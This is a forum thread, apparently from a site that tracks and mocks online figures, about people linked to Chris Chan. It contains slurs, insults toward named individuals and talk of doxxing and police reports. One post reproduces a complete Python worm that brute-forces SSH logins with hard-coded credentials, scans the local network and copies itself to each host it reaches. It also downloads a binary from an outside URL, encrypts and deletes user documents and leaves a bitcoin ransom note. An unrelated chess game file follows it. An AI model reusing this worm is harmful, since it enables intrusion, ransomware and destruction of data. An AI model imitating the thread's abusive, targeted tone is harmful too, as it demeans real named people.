- Joined
- Dec 19, 2020
if she's smart, she wouldn't trolling Chris in the first placeThe funny thing is that now we have evidence of her lying to the police. A smart person would have sat on their hands and let this all play out. Smart she ain't.
Follow along with the video below to see how to install our site as a web app on your home screen.
Note: This feature may not be available in some browsers.
if she's smart, she wouldn't trolling Chris in the first placeThe funny thing is that now we have evidence of her lying to the police. A smart person would have sat on their hands and let this all play out. Smart she ain't.
Uhh @Alexander Hamilton how is all this looking?
The internet is safe now so they don't have their guard upReading these makes me feel like I'm back on 2004 internet, god zoomers are retards.
I like how straight forward about that you mom was about this. Though the pedo rape is a good scare she is definitely smarter than the average person. The amount of shit people put on the internet for fucking free. It ain't doxxing if you put it out on public of your own volition. Not to mention admitting to crimes you're committing on the fucking internet. Is security a lost concept like egyptian artifacts or something?The internet is safe now so they don't have their guard up
When I was a kid if you went to the wrong website it would give your family computer a brain tumor, and my mom told me weekly that if I put any identifying information on my profile, a pedophile would show up and rape me
Lmao what a basic bitch script, I thought she was exceptional, but holy fuck this is another level of hilarity.I attached the sources to the post but I will share them in text, too.
Code:import paramiko import tarfile import sys import socket import nmap import os import sys import struct import fcntl import netifaces import urllib import shutil from subprocess import call # The list of credentials to attempt credList = [ ('hello', 'world'), ('hello1', 'world'), ('root', '#Gig#'), ('cpsc', 'cpsc'), ('ubuntu', '123456') ] # The file marking whether the worm should spread INFECTED_MARKER_FILE = "/tmp/infected.txt" ################################################################## # Returns whether the worm should spread # @return - True if the infection succeeded and false otherwise ################################################################## def isInfectedSystem(ssh): # Check if the system as infected. One # approach is to check for a file called # infected.txt in directory /tmp (which # you created when you marked the system # as infected). try: sftpClient = ssh.open_sftp() sftpClient.stat(INFECTED_MARKER_FILE) return True except: return False ################################################################# # Marks the system as infected ################################################################# def markInfected(): # Mark the system as infected. One way to do # this is to create a file called infected.txt # in directory /tmp/ file_obj = open(INFECTED_MARKER_FILE, "w") file_obj.write("Has anyone really been far as decided to use even go want to do more like?") file_obj.close() ############################################################### # Spread to the other system and execute # @param sshClient - the instance of the SSH client connected # to the victim system ############################################################### def spreadAndExecute(sshClient): wormLoc = "/tmp/extorter_worm.py" if len(sys.argv) >= 2: if sys.argv[1] == "--host": wormLoc = "extorter_worm.py" sftpClient = sshClient.open_sftp() sftpClient.put(wormLoc, "/tmp/extorter_worm.py") sshClient.exec_command("chmod a+x /tmp/extorter_worm.py") sshClient.exec_command("nohup python /tmp/extorter_worm.py &") def tryCredentials(host, userName, _password, sshClient): try: sshClient.connect(host, username=userName, password=_password) return 0 except paramiko.ssh_exception.AuthenticationException: return 1 except socket.error: return 3 def attackSystem(host): # The credential list global credList # Create an instance of the SSH client ssh = paramiko.SSHClient() # Set some parameters to make things easier. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # Go through the credential for (username, password) in credList: # TODO: here you will need to # call the tryCredentials function # to try to connect to the # remote system using the above # credentials. If tryCredentials # returns 0 then we know we have # successfully compromised the # victim. In this case we will # return a tuple containing an # instance of the SSH connection # to the remote system. if tryCredentials(host, username, password, ssh) == 0: print "Success with " + host + " " + username + " " + password return (ssh, username, password) elif tryCredentials(host, username, password, ssh) == 1: print "Wrong Credentials on host " + host continue elif tryCredentials(host, username, password, ssh) == 3: print "No SSH client on " + host break #no ssh client so just stop # Could not find working credentials return None def getMyIP(interface): # TODO: Change this to retrieve and # return the IP of the current system. # Open the socket # Get all the network interfaces on the system networkInterfaces = netifaces.in terfaces() # The IP address ipAddr = None # Go through all the interfaces for netFace in networkInterfaces: # The IP address of the interface addr = netifaces.ifaddresses(netFace)[2][0]['addr'] # Get the IP address if not addr == "127.0.0.1": # Save the IP addrss and break ipAddr = addr break return ipAddr def getHostsOnTheSameNetwork(): # TODO: Add code for scanning # for hosts on the same network # and return the list of discovered # IP addresses. portScanner = nmap.PortScanner() portScanner.scan('192.168.1.0/24', arguments='-p -22 --open') hostInfo = portScanner.all_hosts(); liveHosts = [] ip_add = getMyIP(b"eth0") for host in hostInfo: if portScanner[host].state() == "up" and host != ip_add: liveHosts.append(host) return liveHosts def encryptFiles(): try: urllib.urlretrieve("http://ecs.fullerton.edu/~mgofman/openssl", "openssl") tar = tarfile.open("Documents.tar", "w:gz") tar.add("/home/ubuntu/Documents/") tar.close() call(["chmod", "a+x", "./openssl"]) call(["openssl", "aes-256-cbc", "-a", "-salt", "-in", "Documents.tar", "-out", "Documents.tar.enc", "-k", "cs456worm"]) shutil.rmtree('/home/ubuntu/Documents/') file_obj = open("give_me_moneyz.txt", "w") file_obj.write("Send 100000 btc to 1xcfuh3298sdfz or never see your files again ") file_obj.close() os.remove("Documents.tar") except: print "unable to encrpyt" # Get the hosts on the same network networkHosts = getHostsOnTheSameNetwork() #worm checks if its already exists if not os.path.exists(INFECTED_MARKER_FILE): markInfected() else: print "Already Infected" sys.exit() #if its not host then encrpyt if len(sys.argv) >= 2: print "Host, do not encrpyt" else: encryptFiles() # Go through the network hosts for host in networkHosts: # Try to attack this host sshInfo = attackSystem(host) print sshInfo # Did the attack succeed? if sshInfo: print "Trying to spread" if isInfectedSystem(sshInfo[0]) == True: print "Remote System is Infected" continue else: spreadAndExecute(sshInfo[0]) print "Spreading complete on " + host sys.exit()
Chess.cpp seems unrelated but I will include it anyway
Code:using System.Collections; using System.Collections.Generic; using UnityEngine; namespace Chess.Game { public class HumanPlayer : Player { public enum InputState { None, PieceSelected, DraggingPiece } InputState currentState; BoardUI boardUI; Camera cam; Coord selectedPieceSquare; Board board; public HumanPlayer (Board board) { boardUI = GameObject.FindObjectOfType<BoardUI> (); cam = Camera.main; this.board = board; } public override void NotifyTurnToMove () { } public override void Update () { HandleInput (); } void HandleInput () { Vector2 mousePos = cam.ScreenToWorldPoint (Input.mousePosition); if (currentState == InputState.None) { HandlePieceSelection (mousePos); } else if (currentState == InputState.DraggingPiece) { HandleDragMovement (mousePos); } else if (currentState == InputState.PieceSelected) { HandlePointAndClickMovement (mousePos); } if (Input.GetMouseButtonDown (1)) { CancelPieceSelection (); } } void HandlePointAndClickMovement (Vector2 mousePos) { if (Input.GetMouseButton (0)) { HandlePiecePlacement (mousePos); } } void HandleDragMovement (Vector2 mousePos) { boardUI.DragPiece (selectedPieceSquare, mousePos); // If mouse is released, then try place the piece if (Input.GetMouseButtonUp (0)) { HandlePiecePlacement (mousePos); } } void HandlePiecePlacement (Vector2 mousePos) { Coord targetSquare; if (boardUI.TryGetSquareUnderMouse (mousePos, out targetSquare)) { if (targetSquare.Equals (selectedPieceSquare)) { boardUI.ResetPiecePosition (selectedPieceSquare); if (currentState == InputState.DraggingPiece) { currentState = InputState.PieceSelected; } else { currentState = InputState.None; boardUI.DeselectSquare (selectedPieceSquare); } } else { int targetIndex = BoardRepresentation.IndexFromCoord (targetSquare.fileIndex, targetSquare.rankIndex); if (Piece.IsColour (board.Square[targetIndex], board.ColourToMove) && board.Square[targetIndex] != 0) { CancelPieceSelection (); HandlePieceSelection (mousePos); } else { TryMakeMove (selectedPieceSquare, targetSquare); } } } else { CancelPieceSelection (); } } void CancelPieceSelection () { if (currentState != InputState.None) { currentState = InputState.None; boardUI.DeselectSquare (selectedPieceSquare); boardUI.ResetPiecePosition (selectedPieceSquare); } } void TryMakeMove (Coord startSquare, Coord targetSquare) { int startIndex = BoardRepresentation.IndexFromCoord (startSquare); int targetIndex = BoardRepresentation.IndexFromCoord (targetSquare); bool moveIsLegal = false; Move chosenMove = new Move (); MoveGenerator moveGenerator = new MoveGenerator (); bool wantsKnightPromotion = Input.GetKey (KeyCode.LeftAlt); var legalMoves = moveGenerator.GenerateMoves (board); for (int i = 0; i < legalMoves.Count; i++) { var legalMove = legalMoves[i]; if (legalMove.StartSquare == startIndex && legalMove.TargetSquare == targetIndex) { if (legalMove.IsPromotion) { if (legalMove.MoveFlag == Move.Flag.PromoteToQueen && wantsKnightPromotion) { continue; } if (legalMove.MoveFlag != Move.Flag.PromoteToQueen && !wantsKnightPromotion) { continue; } } moveIsLegal = true; chosenMove = legalMove; // Debug.Log (legalMove.PromotionPieceType); break; } } if (moveIsLegal) { ChoseMove (chosenMove); currentState = InputState.None;- } else { CancelPieceSelection (); } } void HandlePieceSelection (Vector2 mousePos) { if (Input.GetMouseButtonDown (0)) { if (boardUI.TryGetSquareUnderMouse (mousePos, out selectedPieceSquare)) { int index = BoardRepresentation.IndexFromCoord (selectedPieceSquare); // If square contains a piece, select that piece for dragging if (Piece.IsColour (board.Square[index], board.ColourToMove)) { boardUI.HighlightLegalMoves (board, selectedPieceSquare); boardUI.SelectSquare (selectedPieceSquare); currentState = InputState.DraggingPiece; } } } } } }
She does do some of it for class I think but admitting to actually spreading it sure is retarded yes
LMAO! Thank God I archived some of your Reddit posts, Louis!Part 2 of new OP
Calls @Lester Jones post a threat
View attachment 2430402
ffff
Louis continues collecting doxxing, a crime Bella admits to have doing over 90 times.
View attachment 2430404
View attachment 2430406
Louis tries to get the Q angle again, also, says his plan is to say we want Bella to say the tapes are fake to get Chris out and dip
View attachment 2430407
Those damn insurgents are behind it, mr FBI!
View attachment 2430412
Louis says he'll call the FBI, Bella tells him to go 'ead.
View attachment 2430413
Its only 30 people dont worry, Lubbock PD and FBI are on the case.
View attachment 2430414
Bella can take 30 guys at once (finding 30 willing guys would prob eb a struggle). Also, she is innocent.
View attachment 2430416
Louis really wants the school involved.
View attachment 2430418
Has anyone sent these to the police departments in question because now would be a great time for this to go nuclear in their faces lol(If this works I had to leave out two mostly boring shots)
Allen is brought in on the counter ops to make a statement.
View attachment 2430425
More doxxing admittance
View attachment 2430427
Louis Herz finds this funny, and Bella is trying to manipulate the media still.
View attachment 2430430
Yeah uh, Muta wasn't on your side, was he, bella?
View attachment 2430431
The investigators number is dropped that they lied to.
View attachment 2430432
Reported Zoe again.
View attachment 2430434
Louis comes up with more genius plans.
View attachment 2430435
Louis Herz doesn't approve of doxxing guise, unless Bella does it.
View attachment 2430436
More Zoe heat, also, "my gal pals wouldnt turn on me lol u retard"
View attachment 2430441
Inciting more Zoe reports.
View attachment 2430443
Report Zoe, talk to youtubers, this will all blow over.
View attachment 2430444View attachment 2430450
I realise the screenshots got a bit fucked but links work.
The mainstream internet is censored but the underground is not. If you're fucking around with Chris Chan to the point of cheering on incest you are deep in the underground and will be exposed. This isn't Reddit.The internet is safe now so they don't have their guard up
When I was a kid if you went to the wrong website it would give your family computer a brain tumor, and my mom told me weekly that if I put any identifying information on my profile, a pedophile would show up and rape me
Yes, bella herself, Louis even called the FBI!Has anyone sent these to the police departments in question because now would be a great time for this to go nuclear in their faces lol
Bella's glowparents will get her off but Louis is going to get sentenced to years for this. He better keep taking that estrogen, a pair of knockers will come in handy in prison.Has anyone sent these to the police departments in question because now would be a great time for this to go nuclear in their faces lol
What are you talking about, step 7 in the master plan is to spread hilarious false info to poison the well and pretend they don't know that people are watching.You would think after the discord got leaked the "world's greatest troll" would stop using it.
I need to go back over the Zoe chats but it seems while they're innocent to this whole mess, they were not as much of an innocent bystander to the debautchery that they portrayed. "Didn't find out until we broke up" my arse. They're even laughing at Bella's attempts to hide from campus police.View attachment 2430646
I've seen anons on lolcow discussing this message saying that Zoefiri @firion was aware of the animal abuse and did not report it
According to the interview Zoefiri did with @CammieDoxGirl, Zoefiri helped Roman compile the screenshots from the old server that was nuked for Roman's complaint
Therefore, it can be said that they attempted to report it, but TTU didn't want to pursue it further.
They could have gone to the police, but it is unlikely that the police would waste their time investigating a discord screenshot, sadly.